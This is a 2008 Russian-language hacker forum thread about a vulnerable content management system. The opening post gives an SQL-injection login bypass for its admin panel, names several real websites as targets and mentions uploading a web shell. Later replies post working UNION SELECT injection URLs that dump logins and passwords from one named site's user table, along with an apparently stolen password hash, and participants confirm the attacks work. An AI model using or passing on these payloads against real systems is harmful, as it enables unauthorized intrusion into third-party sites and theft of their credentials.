PDA

Просмотр полной версии : Дырявая «cms РусВебДизайн»

mailbrush
11.08.2008, 13:07
Пример того, как не стоит делать CMS.
Офф. сайт - http://ruswebdesign.ru/, причем у них эта CMS не стоит, боятся видимо юзать.

Пример: http://www.alpgalka.ru/admin/
Достаточно ввести в поле логин ' or 1/* и нажать Войти. В админке очень удобно загружать шелл.
Ну и sql-инъекции типа http://www.alpgalka.ru/?page_id=4'

http://www.microplasma.ru/admin/
http://www.akabel.ru/admin/
http://www.eurovolga.ru/admin/

© xaker.name
luz3r
11.08.2008, 16:32
кул уязвимость!!! + =)
Don Anton
11.08.2008, 16:40
Копирайты поставь) А то все думают, что это ты нашёл)))
fly
11.08.2008, 18:13
+1 Don Anton
DDoSька
11.08.2008, 22:32
чет я пробовал,логин admin ,эту фичу,но не робит,скорее всего у меня руки кривые
------------------------------
Я ж говорил,что я кривой,надо мне по больше спать =)
NApoleonchik
11.08.2008, 23:18
все работает) автору +
TheJahte
11.08.2008, 23:56
Прямо говорю )) Дибилы писали xD
luz3r
12.08.2008, 00:06
чет я пробовал,логин admin ,эту фичу,но не робит,скорее всего у меня руки кривые
В логине пишеш - ' or 1/ * , пасс остовляеш пустым =)
TheJahte
12.08.2008, 00:19
Таверна Античат xDDDDDDDD бля... кто так жестко отжоГ ?
TheJahte
12.08.2008, 00:28
http://www.alpgalka.ru/__install/ псц
lisa99
12.08.2008, 00:38
Таверна Античат xDDDDDDDD бля... кто так жестко отжоГ ?

ну и дурость.
нафига палить античат??
напиши - "сайт содержит уязвимсоти. исправим за разумные деньги."..и тп


- и аську..кого-нить из .........))))
TheJahte
12.08.2008, 00:39
Ага )) твою :d
~!DoK_tOR!~
12.08.2008, 01:39
http://www.xaker.name/forvb/showthread.php?p=73641
luz3r
12.08.2008, 12:30
http://www.xaker.name/forvb/showthread.php?p=73641
Интересно кто же скопипастил...
Don Anton
12.08.2008, 12:34
Оба наверно)
TheJahte
12.08.2008, 21:56
Кто скопипастил - тот умрет.
DDoSька
13.08.2008, 08:22
Cms-говно,долго удивлялся....горе кодеры
_______________________________________
А вот и нубо-детки играються :
http://s60.radikal.ru/i170/0808/c1/8a77f9e88c0ft.jpg (http://radikal.ru/F/s60.radikal.ru/i170/0808/c1/8a77f9e88c0f.jpg.html)
Столько пафоса =) ну что ж сказать,ТрЮ Хацкер)
_________________________________________
Я даже знаю как баг залечить,нужен дед через него захим в админку и все тру хацкеры не могут зайти,ибо выдает,что админ уже залогинен =)
ЗЫ:надо будет на милворм написать - они нуждаються в моих творениях)
FaR-G9
15.08.2008, 19:20
прикрыли походу
luz3r
17.08.2008, 13:40
О нет , Web kill , он всех хакнет ............... нед.................. =\\\
TheJahte
23.08.2008, 01:39
http://alpgalka.ru/news.php?nid=7'+union+select+1,2,3,4,5,6,7,8+from+ rwd_users/* чо за нах ? :D
xekz0r
24.08.2008, 20:16
http://alpgalka.ru/news.php?nid=7'+union+select+1,2,3,4,5,6,7,8+from+ rwd_users/* чо за нах ? :D
http://alpgalka.ru/news.php?nid=7'+union+select+1,2,concat_ws(0x3a,lo gin,pass),4,5,6,7,8+from+rwd_users/*

:D
TheJahte
25.08.2008, 17:55
http://alpgalka.ru/news.php?nid=7'+union+select+1,2,concat_ws(0x3a,lo gin,pass),4,5,6,7,8+from+rwd_users/*

:D


Жжошь :)

Тока можна намнога прошэ )

http://alpgalka.ru/news.php?nid=7'+union+select+1,login,pass,4,5,6,7, 8+from+rwd_users/*

хэш - (мд5) - dcd38f72bf2c2f05fd31ac44d34563b4